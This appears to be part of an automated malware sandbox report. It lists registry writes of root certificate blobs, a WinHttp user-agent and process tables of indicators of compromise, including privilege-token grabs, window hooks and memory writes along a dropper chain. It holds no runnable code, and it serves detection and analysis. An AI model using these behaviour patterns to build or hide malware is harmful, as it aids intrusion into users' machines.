Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Sun19de8ff4b6aefeb8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Sun19de8ff4b6aefeb8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun19262b9e49ad.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun19262b9e49ad.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun1917b8fb5f09db8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun19262b9e49ad.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 405 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 5 IoCs

Processes:

GcleanerEU.exeinstaller.exeanyname.exegcleaner.exeautosubplayer.exe

pid process

1308 GcleanerEU.exe
3100 installer.exe
3160 anyname.exe
2344 gcleaner.exe
3180 autosubplayer.exe

description	flow	ioc
HTTP User-Agent header	405	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
1308	GcleanerEU.exe
3100	installer.exe
3160	anyname.exe
2344	gcleaner.exe
3180	autosubplayer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe16825021799.exeChrome 5.exeWerFault.exeWerFault.exeSun195a1614ec24e6a.exeservices64.exeultramediaburner.tmpudptest.exeapinesp.exeexplorer.exe59768322479.exe

pid	process
764	powershell.exe
2280	16825021799.exe
2196	Chrome 5.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
1848	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
968	WerFault.exe
1772	Sun195a1614ec24e6a.exe
1320	services64.exe
2280	16825021799.exe
2308	ultramediaburner.tmp
2308	ultramediaburner.tmp
2280	16825021799.exe
2508	udptest.exe
2500	apinesp.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
2820	59768322479.exe
2820	59768322479.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe
3108	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

Processes:

setup_2.tmpWerFault.exeWerFault.exeWerFault.exeiexplore.exe

pid process

3036 setup_2.tmp
1848 WerFault.exe
968 WerFault.exe
3564 WerFault.exe
1196
4060 iexplore.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Sun1908b94df837b3158.exe

pid process

1824 Sun1908b94df837b3158.exe

pid	process
3036	setup_2.tmp
1848	WerFault.exe
968	WerFault.exe
3564	WerFault.exe
1196
4060	iexplore.exe

pid	process
1824	Sun1908b94df837b3158.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Sun191101c1aaa.exeSun19e4ade31b2a.exeSun19262b9e49ad.exepowershell.exeSun195a1614ec24e6a.exePublicDwlBrowser1100.exe2.exe5.exeBearVpn 3.exe16825021799.exeudptest.exeChrome 5.exetaskkill.exetaskkill.exeSun198361825f4.exeapinesp.exeWerFault.exeWerFault.exeLivelyScreenRecF18.exeservices64.exeexplorer.exetaskkill.exeGarbage Cleaner.exe59768322479.exeapinesp.exeSHelylaewesy.exeGarbage Cleaner.exetaskkill.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1696	Sun191101c1aaa.exe
Token: SeDebugPrivilege	1160	Sun19e4ade31b2a.exe
Token: SeCreateTokenPrivilege	1832	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	1832	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	1832	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	1832	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	1832	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	1832	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	1832	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	1832	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	1832	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	1832	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	1832	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	1832	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	1832	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	1832	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	1832	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	1832	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	1832	Sun19262b9e49ad.exe
Token: SeShutdownPrivilege	1832	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	1832	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	1832	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	1832	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	1832	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	1832	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	1832	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	1832	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	1832	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	1832	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	1832	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	1832	Sun19262b9e49ad.exe
Token: 31	1832	Sun19262b9e49ad.exe
Token: 32	1832	Sun19262b9e49ad.exe
Token: 33	1832	Sun19262b9e49ad.exe
Token: 34	1832	Sun19262b9e49ad.exe
Token: 35	1832	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	1772	Sun195a1614ec24e6a.exe
Token: SeDebugPrivilege	2252	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	2288	2.exe
Token: SeDebugPrivilege	2536	5.exe
Token: SeDebugPrivilege	2900	BearVpn 3.exe
Token: SeDebugPrivilege	2280	16825021799.exe
Token: SeDebugPrivilege	2508	udptest.exe
Token: SeDebugPrivilege	2196	Chrome 5.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	1712	Sun198361825f4.exe
Token: SeDebugPrivilege	2500	apinesp.exe
Token: SeDebugPrivilege	1848	WerFault.exe
Token: SeDebugPrivilege	968	WerFault.exe
Token: SeDebugPrivilege	2612	LivelyScreenRecF18.exe
Token: SeDebugPrivilege	1320	services64.exe
Token: SeLockMemoryPrivilege	3108	explorer.exe
Token: SeLockMemoryPrivilege	3108	explorer.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	3532	Garbage Cleaner.exe
Token: SeDebugPrivilege	2820	59768322479.exe
Token: SeDebugPrivilege	3068	apinesp.exe
Token: SeDebugPrivilege	2220	SHelylaewesy.exe
Token: SeDebugPrivilege	3740	Garbage Cleaner.exe
Token: SeDebugPrivilege	3244	taskkill.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	1644	taskkill.exe

Suspicious use of FindShellTrayWindow 18 IoCs

Processes:

ultramediaburner.tmpiexplore.exeinstaller.exeiexplore.exeiexplore.exe

pid	process
2308	ultramediaburner.tmp
4060	iexplore.exe
3100	installer.exe
1196
1196
4060	iexplore.exe
1196
1196
1980	iexplore.exe
1196
1196
4060	iexplore.exe
3200	iexplore.exe
1196
1196
4060	iexplore.exe
1196
1196

Suspicious use of SetWindowsHookEx 34 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
4060	iexplore.exe
4060	iexplore.exe
3252	IEXPLORE.EXE
3252	IEXPLORE.EXE
3252	IEXPLORE.EXE
3252	IEXPLORE.EXE
4060	iexplore.exe
4060	iexplore.exe
2184	IEXPLORE.EXE
2184	IEXPLORE.EXE
1980	iexplore.exe
1980	iexplore.exe
2184	IEXPLORE.EXE
2184	IEXPLORE.EXE
2256	IEXPLORE.EXE
2256	IEXPLORE.EXE
4060	iexplore.exe
4060	iexplore.exe
3200	iexplore.exe
3200	iexplore.exe
2128	IEXPLORE.EXE
2128	IEXPLORE.EXE
2128	IEXPLORE.EXE
2128	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
4060	iexplore.exe
4060	iexplore.exe
3252	IEXPLORE.EXE
3252	IEXPLORE.EXE
3252	IEXPLORE.EXE
3252	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.exe

description	pid	process	target process
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1100 wrote to memory of 1296	1100	setup_x86_x64_install.exe	setup_installer.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1296 wrote to memory of 1864	1296	setup_installer.exe	setup_install.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 360	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 108	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1472	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
